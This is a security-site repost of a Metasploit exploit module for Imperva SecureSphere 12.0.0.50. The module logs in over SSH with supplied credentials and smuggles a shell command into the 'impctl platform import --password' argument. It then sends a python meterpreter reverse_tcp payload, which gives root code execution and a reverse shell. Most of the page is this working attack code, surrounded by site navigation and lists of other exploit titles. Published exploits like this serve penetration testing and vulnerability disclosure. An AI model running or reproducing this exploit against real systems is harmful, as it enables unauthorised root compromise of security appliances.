首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SecureSphere 12.0.0.50 - SealMode Shell Escape (Metasploit)
来源:metasploit.com 作者:0x09AL 发布时间:2018-08-03  
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::SSH
 
  def initialize(info={})
    super(update_info(info,
      'Name'           => "SecureSphere v12.0.0.50 - SealMode Shell Escape (root)",
      'Description'    => %q{
            This module exploits a vulnerability in SecureSphere cli to escape 
            the sealed-mode of Imperva and execute code as the root user. This 
            module requires credentials of a user to login to the SSH or can be 
            exploited by a less privileged user.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          '0x09AL', # Vulnerability Discovery and Metasploit Module
        ],
      'References'     =>
        [
          ['URL',   'N/A']
        ],
      'DefaultOptions' =>
        {
          'Payload' => 'python/meterpreter/reverse_tcp',
        },
      'Platform'       => ['python'],
      'Arch'           => ARCH_PYTHON,
      'Targets'        => [ ['Automatic', {}] ],
      'Privileged'     => false,
      'DisclosureDate' => "01/08/2018",
      'DefaultTarget'  => 0
    ))
 
    register_options(
      [
        Opt::RHOST(),
        Opt::RPORT(22),
        OptString.new('USERNAME', [ true, 'The username for authentication', 'root' ]),
        OptString.new('Password', [ true, 'The password for authentication', '123456' ]),
      ]
    )
 
    register_advanced_options(
      [
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
      ]
    )
  end
 
  def rhost
    datastore['RHOST']
  end
 
  def rport
    datastore['RPORT']
  end
 
  def username
    datastore['USERNAME']
  end
 
  def password
    datastore['PASSWORD']
  end
 
 
  def exploit
    factory = ssh_socket_factory
    ssh_options = {
      :auth_methods => ['password', 'keyboard-interactive'],
      :port         => rport,
      :use_agent => false,
      :config => false,
      :password => password,
      :proxy => factory,
      :non_interactive => true
    }
 
    ssh_options.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
 
    print_status("#{rhost}:#{rport} - Attempting to login...")
 
    begin
      ssh = nil
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        ssh = Net::SSH.start(rhost, username, ssh_options)
      end
    rescue Rex::ConnectionError
      return
    rescue Net::SSH::Disconnect, ::EOFError
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
      return
    rescue ::Timeout::Error
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
      return
    rescue Net::SSH::AuthenticationFailed
      print_error "#{rhost}:#{rport} SSH - Failed authentication due wrong credentials."
    rescue Net::SSH::Exception => e
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
      return
    end
 
    if ssh
      print_good("SSH connection established successfully.")
      ssh.open_channel do |channel|
        channel.exec "impctl platform import --password \" & uname -a & sh\"" do |ch, success|
            if success
                channel.on_data do |ch, data|
                    if data.inspect.match(/Linux/)
                        print_good "Host is vulnerable"
                        channel.send_data "python -c \"#{payload.encoded}\"\n"
                        channel.close
                    else
                        print_bad "Host is not vulnerable"
                        channel.close
                    end
                 
                end
            end
       
     end
    end
 
      begin
        ssh.loop unless session_created?
      rescue Errno::EBADF => e
        elog(e.message)
      end
    end
  end
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·CoSoSys Endpoint Protector 4.5
·AgataSoft Auto PingMaster 1.5
·Imperva SecureSphere 11.5 / 12
·Sun Solaris 11.3 AVS - Local K
·Allok Fast AVI MPEG Splitter 1
·My Video Converter 1.5.24 Buff
·Easy DVD Creator 2.5.11 Buffer
·Switch Port Mapping Tool 2.81
·MicroFocus Secure Messaging Ga
·SonicWall Global Management Sy
·Vtiger CRM 6.3.0 Authenticated
·Charles Proxy 4.2 Local Root P
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved